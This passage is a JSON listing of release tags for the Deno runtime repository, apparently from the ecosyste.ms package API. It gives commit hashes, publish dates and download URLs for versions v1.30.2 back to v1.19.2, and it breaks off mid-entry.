{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.0